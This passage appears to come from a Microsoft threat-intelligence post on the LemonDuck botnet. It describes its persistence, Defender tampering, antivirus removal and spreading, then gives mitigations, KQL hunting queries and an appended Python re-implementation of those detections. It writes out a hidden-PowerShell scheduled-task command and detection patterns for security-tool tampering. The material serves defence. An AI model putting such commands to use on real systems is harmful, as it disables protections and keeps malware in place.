it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names.\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days of raw data and locate potential LemonDuck-related indicators older than a week, go to the **Advanced Hunting** page > **Query** tab and use the calendar drop-down menu to change the query range to **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for the subject lines used from 2020 to 2021 by the dropped scripts that attach malicious LemonDuck samples to emails and send them to the contacts of mailboxes on impacted machines, and requires that the message carries at least one attachment. The attachment types to check for at present are .DOC, .ZIP, or .JS, though these, like the subjects themselves, are subject to change. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for runs of a function named \u201cSIEX\u201d, which the LemonDuck initialization scripts use to assign a specific user agent for reporting back to command-and-control infrastructure. Corroborate hits with surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for known LemonDuck keyword variations in command lines initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, some Lemon_Duck variants do not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or similar malware attempts to modify Microsoft Defender Antivirus by disabling real-time monitoring or adding entire drive letters to the exclusion list. Because of how exclusions are applied, the exclusion additions will often succeed even if tamper protection is enabled, so review the configured Defender exclusions after any hit. Custom alerts could be created for the drive letters common in your environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or similar malware uses WMIC to silently remove competing security products: it enumerates installed products by name and invokes the product uninstall method with the /nointeractive switch. The query matches that command shape and then filters on the vendor keywords LemonDuck targets; extend the keyword list with the security products deployed in your environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions that attempt to evade detection while downloading supporting scripts, such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware, as well as the mining components and potential secondary functions. The more specific clauses are included for environments where the general clause produces false positives; the most general clause is intended to catch minor script or component changes, such as a switch to non-.bin files or uncommon components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks, or for the semi-unique task creation pattern LemonDuck also uses: a hidden PowerShell process launched under a randomly generated task name. An example with a randomly generated name is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for activity of the LemonDuck component KR.Bin, which kills competing malware before the installation and persistence of LemonDuck itself are made concrete. The killer script is based on historical versions from 2018 and earlier and has grown over time to include the scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper bound in this query can be modified, and the query can be adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event in which LemonDuck resolves the IP address of a C2 and writes that address into the hosts file under a randomly generated name that does not otherwise exist. The script then instructs the machine to download data from that name. The query has a more general and a more specific clause, so the technique is also detected if other activity groups adopt it. 
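The Defender tampering, antivirus uninstallation, scheduled task creation and competition-killer queries above each reduce to a keyword filter, and the killer query adds a per-device aggregation with a count band. The following Python is an added example, not code from the Microsoft post or from Microsoft 365 Defender: it re-expresses that logic so the filters and the 40-80 threshold can be exercised offline. It assumes a substring approximation of KQL `has` (which matches whole terms, so the approximation is slightly broader), and every event record below is constructed, not real telemetry.

```python
from collections import defaultdict


def has_all(text, *terms):
    """Approximates KQL has_all(). Assumption: plain case-insensitive substring
    matching; KQL `has` matches whole terms, so this version is slightly broader."""
    t = text.lower()
    return all(term.lower() in t for term in terms)


def has_any(text, *terms):
    """Approximates KQL has_any(), with the same caveat as has_all()."""
    t = text.lower()
    return any(term.lower() in t for term in terms)


def _proc(device, file_name, cmd, init_name="cmd.exe", init_cmd=""):
    """Build a record shaped like the DeviceProcessEvents columns the queries use."""
    return {"DeviceId": device, "FileName": file_name, "ProcessCommandLine": cmd,
            "InitiatingProcessFileName": init_name, "InitiatingProcessCommandLine": init_cmd}


# Task names from the post's killer query, plus constructed filler names so that
# host-a deletes 45 distinct tasks (inside the 40-80 band) while host-b deletes one.
KILLER_NAMES = ["Mysa", "Sorry", "Oracle Java Update", "ok"]
KILL_LIST = KILLER_NAMES + [f"Filler{i:02d}" for i in range(41)]

# Constructed sample events, not real telemetry.
EVENTS = (
    [_proc("host-a", "schtasks.exe", f'schtasks.exe /Delete /TN "{n}" /F') for n in KILL_LIST]
    + [_proc("host-b", "schtasks.exe", 'schtasks.exe /Delete /TN "Oracle Java Update" /F')]
    + [_proc("host-a", "schtasks.exe",
             'schtasks.exe /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV '
             '/F /tr "powershell -w hidden -c PS_CMD"')]
    + [_proc("host-d", "schtasks.exe", "schtasks.exe /create /tn NightlyBackup /sc daily /tr backup.exe")]
    + [_proc("host-a", "conhost.exe", "conhost.exe", init_name="powershell.exe",
             init_cmd="powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1; "
                      "Add-MpPreference -ExclusionProcess C:\\")]
    + [_proc("host-c", "msiexec.exe", "msiexec.exe /x /qn", init_name="wmic.exe",
             init_cmd="wmic product where \"name like '%Kaspersky%'\" call uninstall /nointeractive")]
)


def defender_tampering(events):
    """'LemonDuck Microsoft Defender tampering': all four tokens in one initiating
    command line. A split invocation (disable first, exclude later) would be missed."""
    return sorted({e["DeviceId"] for e in events
                   if has_all(e["InitiatingProcessCommandLine"], "Set-MpPreference",
                              "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")})


def av_uninstall(events):
    """'Antivirus uninstallation attempts': wmic product ... call uninstall /nointeractive."""
    vendors = ("Kaspersky", "avast", "avp", "security", "eset", "AntiVirus", "Norton Security")
    return sorted({e["DeviceId"] for e in events
                   if e["InitiatingProcessFileName"].lower() == "wmic.exe"
                   and has_all(e["InitiatingProcessCommandLine"], "product where", "name like",
                               "call uninstall", "/nointeractive")
                   and has_any(e["InitiatingProcessCommandLine"], *vendors)})


def lemonduck_task_creation(events):
    """'LemonDuck named scheduled creation': static task names or the hidden-PowerShell pattern."""
    hits = set()
    for e in events:
        cmd = e["ProcessCommandLine"]
        if e["FileName"].lower() != "schtasks.exe" or not has_all(cmd, "/create"):
            continue
        if has_any(cmd, "/tn blackball", "/tn blutea", "/tn rtsa") or has_all(
                cmd, "/create", "/ru", "system", "/sc", "/mo", "/tn", "/F", "/tr",
                "powershell -w hidden -c PS_CMD"):
            hits.add(e["DeviceId"])
    return sorted(hits)


def competition_killer(events, low=40, high=80):
    """'Competition killer script': per device, collect the distinct schtasks /Delete
    command lines; fire only when a known killer name is present AND the count sits in
    [low, high], so a single legitimate task deletion never triggers."""
    per_device = defaultdict(set)
    for e in events:
        if has_all(e["ProcessCommandLine"], "schtasks.exe", "/Delete", "/TN", "/F"):
            per_device[e["DeviceId"]].add(e["ProcessCommandLine"])
    return sorted(dev for dev, cmds in per_device.items()
                  if low <= len(cmds) <= high and any(has_any(c, *KILLER_NAMES) for c in cmds))


def hunt(events):
    """Run every detection and return {name: [DeviceId, ...]}."""
    return {"defender_tampering": defender_tampering(events),
            "av_uninstall": av_uninstall(events),
            "lemonduck_task_creation": lemonduck_task_creation(events),
            "competition_killer": competition_killer(events)}


if __name__ == "__main__":
    for name, devices in hunt(EVENTS).items():
        print(f"{name:24} {devices}")
```

Running the block reports host-a for the tampering, task creation and killer detections and host-c for the antivirus uninstall; host-b, with its single deletion, stays below the band, and host-d's ordinary backup task does not match either creation pattern. Lowering `low` to 1 shows how quickly the killer rule would start flagging routine administration, which is why the post bounds the count.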
